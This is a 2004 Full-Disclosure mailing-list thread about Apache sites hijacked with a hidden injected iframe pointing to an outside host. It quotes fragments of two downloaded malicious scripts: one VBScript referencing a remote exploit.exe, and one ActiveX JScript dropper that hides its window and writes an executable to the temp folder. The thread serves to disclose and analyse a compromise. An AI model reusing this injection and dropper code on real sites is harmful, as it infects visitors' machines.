Re: browser hijack by apache sites

[D B <geggam692000 () yahoo com>]

 using konqueror i got it to download these two files 

Filename 1: 2DimensionOfExploitsEnc.php

<html>

<script language=vbs>
szURL = "http://www.pizdato.biz/acc1/exploit.exe";
</script>

<script language="VBScript.Encode">

Filename 2: object2.cfm

<script language=jscript>
self.moveTo(5000,5000);
self.close();
fs=new ActiveXObject("Scripting.FileSystemObject");
fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
a=fs.CreateTextFile(fname,true);
a.Write('MZ');
a.Close();
a=fs.OpenTextFile(fname,8,false,true);



> Message: 1
> From: Filbert <filbert () pandora be>
> Reply-To: filbert () pandora be
> To: full-disclosure () lists netsys com
> Date: Sun, 23 May 2004 15:19:30 +0200
> Organization: Hell
> Subject: [Full-disclosure] browser hijack by apache
> sites

> Hi,

> This is the second time this weekend that I've been
> warned of an apache 
> site 
> on a Linux server were a line of code was added to
> redirect browsers to  
> porn 
> sites.
> First was the site of a Belgian political party.
> Second came today, and 
> as of 
> writing this it's still there. The admin was informed
> so it can be gone 
> soon.

> hxxp://www.previsit.com/carrefour/nl/ <- hxxp must
> changed to http
> IE users do NOT click.

> the code added at the bottom is:

> <iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1

> HEIGHT=1></iframe></body>

> anyone seen this before? What vulnerability is
> exploited here? FP?

> Thx,
> Filb.


        
                
__________________________________
Do you Yahoo!?
Yahoo! Domains – Claim yours for only $14.70/year
http://smallbusiness.promotions.yahoo.com/offer 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html